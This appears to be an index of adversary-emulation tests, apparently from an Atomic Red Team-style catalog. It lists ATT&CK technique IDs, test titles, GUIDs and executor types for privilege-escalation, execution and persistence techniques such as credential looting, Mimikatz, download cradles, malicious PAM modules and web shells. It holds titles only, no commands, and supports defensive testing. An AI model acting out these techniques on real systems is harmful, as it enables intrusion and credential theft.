698 privilege-escalation T1546.007 Event Triggered Execution: Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
699 privilege-escalation T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
700 privilege-escalation T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
701 privilege-escalation T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
702 privilege-escalation T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
703 privilege-escalation T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
704 privilege-escalation T1078.003 Valid Accounts: Local Accounts 6 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
705 privilege-escalation T1078.003 Valid Accounts: Local Accounts 7 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
706 privilege-escalation T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
707 privilege-escalation T1078.003 Valid Accounts: Local Accounts 9 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
708 privilege-escalation T1078.003 Valid Accounts: Local Accounts 10 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
709 privilege-escalation T1574.012 Hijack Execution Flow: COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
710 privilege-escalation T1574.012 Hijack Execution Flow: COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
711 privilege-escalation T1574.012 Hijack Execution Flow: COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
712 execution T1053.005 Scheduled Task/Job: Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
713 execution T1053.005 Scheduled Task/Job: Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
714 execution T1053.005 Scheduled Task/Job: Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
715 execution T1053.005 Scheduled Task/Job: Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
716 execution T1053.005 Scheduled Task/Job: Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
717 execution T1053.005 Scheduled Task/Job: Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
718 execution T1053.005 Scheduled Task/Job: Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
719 execution T1053.005 Scheduled Task/Job: Scheduled Task 8 Import XML Schedule Task with Hidden Attribute cd925593-fbb4-486d-8def-16cbdf944bf4 powershell
720 execution T1053.005 Scheduled Task/Job: Scheduled Task 9 PowerShell Modify A Scheduled Task dda6fc7b-c9a6-4c18-b98d-95ec6542af6d powershell
721 execution T1047 Windows Management Instrumentation 1 WMI Reconnaissance Users c107778c-dcf5-47c5-af2e-1d058a3df3ea command_prompt
722 execution T1047 Windows Management Instrumentation 2 WMI Reconnaissance Processes 5750aa16-0e59-4410-8b9a-8a47ca2788e2 command_prompt
723 execution T1047 Windows Management Instrumentation 3 WMI Reconnaissance Software 718aebaa-d0e0-471a-8241-c5afa69c7414 command_prompt
724 execution T1047 Windows Management Instrumentation 4 WMI Reconnaissance List Remote Services 0fd48ef7-d890-4e93-a533-f7dedd5191d3 command_prompt
725 execution T1047 Windows Management Instrumentation 5 WMI Execute Local Process b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 command_prompt
726 execution T1047 Windows Management Instrumentation 6 WMI Execute Remote Process 9c8ef159-c666-472f-9874-90c8d60d136b command_prompt
727 execution T1047 Windows Management Instrumentation 7 Create a Process using WMI Query and an Encoded Command 7db7a7f9-9531-4840-9b30-46220135441c command_prompt
728 execution T1047 Windows Management Instrumentation 8 Create a Process using obfuscated Win32_Process 10447c83-fc38-462a-a936-5102363b1c43 powershell
729 execution T1047 Windows Management Instrumentation 9 WMI Execute rundll32 00738d2a-4651-4d76-adf2-c43a41dfb243 powershell
730 execution T1047 Windows Management Instrumentation 10 Application uninstall using WMIC c510d25b-1667-467d-8331-a56d3e9bc4ff command_prompt
731 execution T1059.007 Command and Scripting Interpreter: JavaScript 1 JScript execution to gather local computer information via cscript 01d75adf-ca1b-4dd1-ac96-7c9550ad1035 command_prompt
732 execution T1059.007 Command and Scripting Interpreter: JavaScript 2 JScript execution to gather local computer information via wscript 0709945e-4fec-4c49-9faf-c3c292a74484 command_prompt
733 execution T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
734 execution T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
735 execution T1559.002 Inter-Process Communication: Dynamic Data Exchange 1 Execute Commands f592ba2a-e9e8-4d62-a459-ef63abd819fd manual
736 execution T1559.002 Inter-Process Communication: Dynamic Data Exchange 2 Execute PowerShell script via Word DDE 47c21fb6-085e-4b0d-b4d2-26d72c3830b3 command_prompt
737 execution T1559.002 Inter-Process Communication: Dynamic Data Exchange 3 DDEAUTO cf91174c-4e74-414e-bec0-8d60a104d181 manual
738 execution T1204.002 User Execution: Malicious File 1 OSTap Style Macro Execution 8bebc690-18c7-4549-bc98-210f7019efff powershell
739 execution T1204.002 User Execution: Malicious File 2 OSTap Payload Download 3f3af983-118a-4fa1-85d3-ba4daa739d80 command_prompt
740 execution T1204.002 User Execution: Malicious File 3 Maldoc choice flags command execution 0330a5d2-a45a-4272-a9ee-e364411c4b18 powershell
741 execution T1204.002 User Execution: Malicious File 4 OSTAP JS version add560ef-20d6-4011-a937-2c340f930911 powershell
742 execution T1204.002 User Execution: Malicious File 5 Office launching .bat file from AppData 9215ea92-1ded-41b7-9cd6-79f9a78397aa powershell
743 execution T1204.002 User Execution: Malicious File 6 Excel 4 Macro 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 powershell
744 execution T1204.002 User Execution: Malicious File 7 Headless Chrome code execution via VBA a19ee671-ed98-4e9d-b19c-d1954a51585a powershell
745 execution T1204.002 User Execution: Malicious File 8 Potentially Unwanted Applications (PUA) 02f35d62-9fdc-4a97-b899-a5d9a876d295 powershell
746 execution T1204.002 User Execution: Malicious File 9 Office Generic Payload Download 5202ee05-c420-4148-bf5e-fd7f7d24850c powershell
747 execution T1204.002 User Execution: Malicious File 10 LNK Payload Download 581d7521-9c4b-420e-9695-2aec5241167f powershell
748 execution T1204.002 User Execution: Malicious File 11 Mirror Blast Emulation 24fd9719-7419-42dd-bce6-ab3463110b3c powershell
749 execution T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
750 execution T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
751 execution T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
752 execution T1059.002 Command and Scripting Interpreter: AppleScript 1 AppleScript 3600d97d-81b9-4171-ab96-e4386506e2c2 sh
753 execution T1106 Native API 1 Execution through API - CreateProcess 99be2089-c52d-4a4a-b5c3-261ee42c8b62 command_prompt
754 execution T1106 Native API 2 WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique ce4e76e6-de70-4392-9efe-b281fc2b4087 powershell
755 execution T1106 Native API 3 WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique 7ec5b74e-8289-4ff2-a162-b6f286a33abd powershell
756 execution T1106 Native API 4 WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique e1f93a06-1649-4f07-89a8-f57279a7d60e powershell
757 execution T1610 Deploy a container 1 Deploy Docker container 59aa6f26-7620-417e-9318-589e0fb7a372 bash
758 execution T1609 Kubernetes Exec Into Container 1 ExecIntoContainer d03bfcd3-ed87-49c8-8880-44bb772dea4b bash
759 execution T1609 Kubernetes Exec Into Container 2 Docker Exec Into Container 900e2c49-221b-42ec-ae3c-4717e41e6219 bash
760 execution T1569.001 System Services: Launchctl 1 Launchctl 6fb61988-724e-4755-a595-07743749d4e2 bash
761 execution T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
762 execution T1072 Software Deployment Tools 2 PDQ Deploy RAT e447b83b-a698-4feb-bed1-a7aaf45c3443 command_prompt
763 execution T1059.001 Command and Scripting Interpreter: PowerShell 1 Mimikatz f3132740-55bc-48c4-bcc0-758a459cd027 command_prompt
764 execution T1059.001 Command and Scripting Interpreter: PowerShell 2 Run BloodHound from local disk a21bb23e-e677-4ee7-af90-6931b57b6350 powershell
765 execution T1059.001 Command and Scripting Interpreter: PowerShell 3 Run Bloodhound from Memory using Download Cradle bf8c1441-4674-4dab-8e4e-39d93d08f9b7 powershell
766 execution T1059.001 Command and Scripting Interpreter: PowerShell 4 Obfuscation Tests 4297c41a-8168-4138-972d-01f3ee92c804 powershell
767 execution T1059.001 Command and Scripting Interpreter: PowerShell 5 Mimikatz - Cradlecraft PsSendKeys af1800cf-9f9d-4fd1-a709-14b1e6de020d powershell
768 execution T1059.001 Command and Scripting Interpreter: PowerShell 6 Invoke-AppPathBypass 06a220b6-7e29-4bd8-9d07-5b4d86742372 command_prompt
769 execution T1059.001 Command and Scripting Interpreter: PowerShell 7 Powershell MsXml COM object - with prompt 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da command_prompt
770 execution T1059.001 Command and Scripting Interpreter: PowerShell 8 Powershell XML requests 4396927f-e503-427b-b023-31049b9b09a6 command_prompt
771 execution T1059.001 Command and Scripting Interpreter: PowerShell 9 Powershell invoke mshta.exe download 8a2ad40b-12c7-4b25-8521-2737b0a415af command_prompt
772 execution T1059.001 Command and Scripting Interpreter: PowerShell 10 Powershell Invoke-DownloadCradle cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 manual
773 execution T1059.001 Command and Scripting Interpreter: PowerShell 11 PowerShell Fileless Script Execution fa050f5e-bc75-4230-af73-b6fd7852cd73 powershell
774 execution T1059.001 Command and Scripting Interpreter: PowerShell 12 PowerShell Downgrade Attack 9148e7c4-9356-420e-a416-e896e9c0f73e powershell
775 execution T1059.001 Command and Scripting Interpreter: PowerShell 13 NTFS Alternate Data Stream Access 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 powershell
776 execution T1059.001 Command and Scripting Interpreter: PowerShell 14 PowerShell Session Creation and Use 7c1acec2-78fa-4305-a3e0-db2a54cddecd powershell
777 execution T1059.001 Command and Scripting Interpreter: PowerShell 15 ATHPowerShellCommandLineParameter -Command parameter variations 686a9785-f99b-41d4-90df-66ed515f81d7 powershell
778 execution T1059.001 Command and Scripting Interpreter: PowerShell 16 ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments 1c0a870f-dc74-49cf-9afc-eccc45e58790 powershell
779 execution T1059.001 Command and Scripting Interpreter: PowerShell 17 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations 86a43bad-12e3-4e85-b97c-4d5cf25b95c3 powershell
780 execution T1059.001 Command and Scripting Interpreter: PowerShell 18 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments 0d181431-ddf3-4826-8055-2dbf63ae848b powershell
781 execution T1059.001 Command and Scripting Interpreter: PowerShell 19 PowerShell Command Execution a538de64-1c74-46ed-aa60-b995ed302598 command_prompt
782 execution T1059.001 Command and Scripting Interpreter: PowerShell 20 PowerShell Invoke Known Malicious Cmdlets 49eb9404-5e0f-4031-a179-b40f7be385e3 powershell
783 execution T1059.001 Command and Scripting Interpreter: PowerShell 21 PowerUp Invoke-AllChecks 1289f78d-22d2-4590-ac76-166737e1811b powershell
784 execution T1059.001 Command and Scripting Interpreter: PowerShell 22 Abuse Nslookup with DNS Records 999bff6d-dc15-44c9-9f5c-e1051bfc86e1 powershell
785 execution T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
786 execution T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
787 execution T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
788 execution T1059.004 Command and Scripting Interpreter: Bash 1 Create and Execute Bash Shell Script 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 sh
789 execution T1059.004 Command and Scripting Interpreter: Bash 2 Command-Line Interface d0c88567-803d-4dca-99b4-7ce65e7b257c sh
790 execution T1059.004 Command and Scripting Interpreter: Bash 3 Harvest SUID executable files 46274fc6-08a7-4956-861b-24cbbaa0503c sh
791 execution T1059.004 Command and Scripting Interpreter: Bash 4 LinEnum tool execution a2b35a63-9df1-4806-9a4d-5fe0500845f2 sh
792 execution T1059.004 Command and Scripting Interpreter: Bash 5 New script file in the tmp directory 8cd1947b-4a54-41fb-b5ea-07d0ace04f81 sh
793 execution T1059.004 Command and Scripting Interpreter: Bash 6 What shell is running 7b38e5cc-47be-44f0-a425-390305c76c17 sh
794 execution T1059.004 Command and Scripting Interpreter: Bash 7 What shells are available bf23c7dc-1004-4949-8262-4c1d1ef87702 sh
795 execution T1059.004 Command and Scripting Interpreter: Bash 8 Command line scripts b04ed73c-7d43-4dc8-b563-a2fc595cba1a sh
796 execution T1059.004 Command and Scripting Interpreter: Bash 9 Obfuscated command line scripts 5bec4cc8-f41e-437b-b417-33ff60acf9af sh
797 execution T1059.004 Command and Scripting Interpreter: Bash 10 Change login shell c7ac59cb-13cc-4622-81dc-6d2fee9bfac7 bash
798 execution T1059.004 Command and Scripting Interpreter: Bash 11 Environment variable scripts bdaebd56-368b-4970-a523-f905ff4a8a51 bash
799 execution T1059.004 Command and Scripting Interpreter: Bash 12 Detecting pipe-to-shell fca246a8-a585-4f28-a2df-6495973976a1 bash
800 execution T1559 Inter-Process Communication 1 Cobalt Strike Artifact Kit pipe bd13b9fc-b758-496a-b81a-397462f82c72 command_prompt
801 execution T1559 Inter-Process Communication 2 Cobalt Strike Lateral Movement (psexec_psh) pipe 830c8b6c-7a70-4f40-b975-8bbe74558acd command_prompt
802 execution T1559 Inter-Process Communication 3 Cobalt Strike SSH (postex_ssh) pipe d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6 command_prompt
803 execution T1559 Inter-Process Communication 4 Cobalt Strike post-exploitation pipe (4.2 and later) 7a48f482-246f-4aeb-9837-21c271ebf244 command_prompt
804 execution T1559 Inter-Process Communication 5 Cobalt Strike post-exploitation pipe (before 4.2) 8dbfc15c-527b-4ab0-a272-019f469d367f command_prompt
805 execution T1204.003 User Execution: Malicious Image 1 Malicious Execution from Mounted ISO Image e9795c8d-42aa-4ed4-ad80-551ed793d006 powershell
806 execution T1059.006 Command and Scripting Interpreter: Python 1 Execute shell script via python's command mode arguement 3a95cdb2-c6ea-4761-b24e-02b71889b8bb sh
807 execution T1059.006 Command and Scripting Interpreter: Python 2 Execute Python via scripts (Linux) 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 sh
808 execution T1059.006 Command and Scripting Interpreter: Python 3 Execute Python via Python executables (Linux) 0b44d79b-570a-4b27-a31f-3bf2156e5eaa sh
809 execution T1059.006 Command and Scripting Interpreter: Python 4 Python pty module and spawn function used to spawn sh or bash 161d694c-b543-4434-85c3-c3a433e33792 bash
810 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 1 Create and Execute Batch Script 9e8894c0-50bd-4525-a96c-d4ac78ece388 powershell
811 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 2 Writes text to a file and displays it. 127b4afe-2346-4192-815c-69042bec570e command_prompt
812 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 3 Suspicious Execution via Windows Command Shell d0eb3597-a1b3-4d65-b33b-2cda8d397f20 command_prompt
813 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 4 Simulate BlackByte Ransomware Print Bombing 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9 powershell
814 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 5 Command Prompt read contents from CMD file and execute df81db1b-066c-4802-9bc8-b6d030c3ba8e command_prompt
815 execution T1059.005 Command and Scripting Interpreter: Visual Basic 1 Visual Basic script execution to gather local computer information 1620de42-160a-4fe5-bbaf-d3fef0181ce9 powershell
816 execution T1059.005 Command and Scripting Interpreter: Visual Basic 2 Encoded VBS code execution e8209d5f-e42d-45e6-9c2f-633ac4f1eefa powershell
817 execution T1059.005 Command and Scripting Interpreter: Visual Basic 3 Extract Memory via VBA 8faff437-a114-4547-9a60-749652a03df6 powershell
818 execution T1569.002 System Services: Service Execution 1 Execute a Command as a Service 2382dee2-a75f-49aa-9378-f52df6ed3fb1 command_prompt
819 execution T1569.002 System Services: Service Execution 2 Use PsExec to execute a command on a remote host 873106b7-cfed-454b-8680-fa9f6400431c command_prompt
820 execution T1569.002 System Services: Service Execution 3 psexec.py (Impacket) edbcd8c9-3639-4844-afad-455c91e95a35 bash
821 execution T1569.002 System Services: Service Execution 4 BlackCat pre-encryption cmds with Lateral Movement 31eb7828-97d7-4067-9c1e-c6feb85edc4b powershell
822 execution T1569.002 System Services: Service Execution 5 Use RemCom to execute a command on a remote host a5d8cdeb-be90-43a9-8b26-cc618deac1e0 command_prompt
823 execution T1569.002 System Services: Service Execution 6 Snake Malware Service Create b8db787e-dbea-493c-96cb-9272296ddc49 command_prompt
824 execution T1053.002 Scheduled Task/Job: At 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
825 execution T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
826 persistence T1053.005 Scheduled Task/Job: Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
827 persistence T1053.005 Scheduled Task/Job: Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
828 persistence T1053.005 Scheduled Task/Job: Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
829 persistence T1053.005 Scheduled Task/Job: Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
830 persistence T1053.005 Scheduled Task/Job: Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
831 persistence T1053.005 Scheduled Task/Job: Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
832 persistence T1053.005 Scheduled Task/Job: Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
833 persistence T1053.005 Scheduled Task/Job: Scheduled Task 8 Import XML Schedule Task with Hidden Attribute cd925593-fbb4-486d-8def-16cbdf944bf4 powershell
834 persistence T1053.005 Scheduled Task/Job: Scheduled Task 9 PowerShell Modify A Scheduled Task dda6fc7b-c9a6-4c18-b98d-95ec6542af6d powershell
835 persistence T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
836 persistence T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
837 persistence T1546.013 Event Triggered Execution: PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
838 persistence T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
839 persistence T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
840 persistence T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
841 persistence T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
842 persistence T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
843 persistence T1547 Boot or Logon Autostart Execution 1 Add a driver cb01b3da-b0e7-4e24-bf6d-de5223526785 command_prompt
844 persistence T1547.014 Active Setup 1 HKLM - Add atomic_test key to launch executable as part of user setup deff4586-0517-49c2-981d-bbea24d48d71 powershell
845 persistence T1547.014 Active Setup 2 HKLM - Add malicious StubPath value to existing Active Setup Entry 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a powershell
846 persistence T1547.014 Active Setup 3 HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number 04d55cef-f283-40ba-ae2a-316bc3b5e78c powershell
847 persistence T1543.003 Create or Modify System Process: Windows Service 1 Modify Fax service to run PowerShell ed366cde-7d12-49df-a833-671904770b9f command_prompt
848 persistence T1543.003 Create or Modify System Process: Windows Service 2 Service Installation CMD 981e2942-e433-44e9-afc1-8c957a1496b6 command_prompt
849 persistence T1543.003 Create or Modify System Process: Windows Service 3 Service Installation PowerShell 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 powershell
850 persistence T1543.003 Create or Modify System Process: Windows Service 4 TinyTurla backdoor service w64time ef0581fd-528e-4662-87bc-4c2affb86940 command_prompt
851 persistence T1543.003 Create or Modify System Process: Windows Service 5 Remote Service Installation CMD fb4151a2-db33-4f8c-b7f8-78ea8790f961 command_prompt
852 persistence T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
853 persistence T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
854 persistence T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
855 persistence T1137 Office Application Startup 1 Office Application Startup - Outlook as a C2 bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c command_prompt
856 persistence T1574.001 Hijack Execution Flow: DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
857 persistence T1137.006 Office Application Startup: Add-ins 1 Code Executed Via Excel Add-in File (XLL) 441b1a0f-a771-428a-8af0-e99e4698cda3 powershell
858 persistence T1137.006 Office Application Startup: Add-ins 2 Persistent Code Execution Via Excel Add-in File (XLL) 9c307886-9fef-41d5-b344-073a0f5b2f5f powershell
859 persistence T1137.006 Office Application Startup: Add-ins 3 Persistent Code Execution Via Word Add-in File (WLL) 95408a99-4fa7-4cd6-a7ef-cb65f86351cf powershell
860 persistence T1137.006 Office Application Startup: Add-ins 4 Persistent Code Execution Via Excel VBA Add-in File (XLAM) 082141ed-b048-4c86-99c7-2b8da5b5bf48 powershell
861 persistence T1137.006 Office Application Startup: Add-ins 5 Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM) f89e58f9-2b49-423b-ac95-1f3e7cfd8277 powershell
862 persistence T1505.002 Server Software Component: Transport Agent 1 Install MS Exchange Transport Agent Persistence 43e92449-ff60-46e9-83a3-1a38089df94d powershell
863 persistence T1556.002 Modify Authentication Process: Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
864 persistence T1505.005 Server Software Component: Terminal Services DLL 1 Simulate Patching termsrv.dll 0b2eadeb-4a64-4449-9d43-3d999f4a317b powershell
865 persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
866 persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
867 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
868 persistence T1176 Browser Extensions 4 Edge Chromium Addon - VPN 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 manual
869 persistence T1176 Browser Extensions 5 Google Chrome Load Unpacked Extension With Command Line 7a714703-9f6b-461c-b06d-e6aeac650f27 powershell
870 persistence T1546.011 Event Triggered Execution: Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
871 persistence T1546.011 Event Triggered Execution: Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
872 persistence T1546.011 Event Triggered Execution: Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
873 persistence T1547.010 Boot or Logon Autostart Execution: Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
874 persistence T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
875 persistence T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 1 Shortcut Modification ce4fc678-364f-4282-af16-2fb4c78005ce command_prompt
876 persistence T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
877 persistence T1547.005 Boot or Logon Autostart Execution: Security Support Provider 1 Modify SSP configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
878 persistence T1543.004 Create or Modify System Process: Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
879 persistence T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
880 persistence T1505.003 Server Software Component: Web Shell 1 Web Shell Written to Disk 0a2ce662-1efa-496f-a472-2fe7b080db16 command_prompt
881 persistence T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
882 persistence T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
883 persistence T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 command_prompt
884 persistence T1547.003 Time Providers 1 Create a new time provider df1efab7-bc6d-4b88-8be9-91f55ae017aa powershell
885 persistence T1547.003 Time Providers 2 Edit an existing time provider 29e0afca-8d1d-471a-8d34-25512fc48315 powershell
886 persistence T1546.005 Event Triggered Execution: Trap 1 Trap EXIT a74b2e07-5952-4c03-8b56-56274b076b61 sh
887 persistence T1546.005 Event Triggered Execution: Trap 2 Trap SIGINT a547d1ba-1d7a-4cc5-a9cb-8d65e8809636 sh
888 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
889 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
890 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 3 Dylib Injection via DYLD_INSERT_LIBRARIES 4d66029d-7355-43fd-93a4-b63ba92ea1be bash
891 persistence T1136.001 Create Account: Local Account 1 Create a user account on a Linux system 40d8eabd-e394-46f6-8785-b9bfa1d011d2 bash
892 persistence T1136.001 Create Account: Local Account 2 Create a user account on a MacOS system 01993ba5-1da3-4e15-a719-b690d4f0f0b2 bash
893 persistence T1136.001 Create Account: Local Account 3 Create a new user in a command prompt 6657864e-0323-4206-9344-ac9cd7265a4f command_prompt
894 persistence T1136.001 Create Account: Local Account 4 Create a new user in PowerShell bc8be0ac-475c-4fbf-9b1d-9fffd77afbde powershell
895 persistence T1136.001 Create Account: Local Account 5 Create a new user in Linux with `root` UID and GID. a1040a30-d28b-4eda-bd99-bb2861a4616c bash
896 persistence T1136.001 Create Account: Local Account 6 Create a new Windows admin user fda74566-a604-4581-a4cc-fbbe21d66559 command_prompt
897 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
898 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
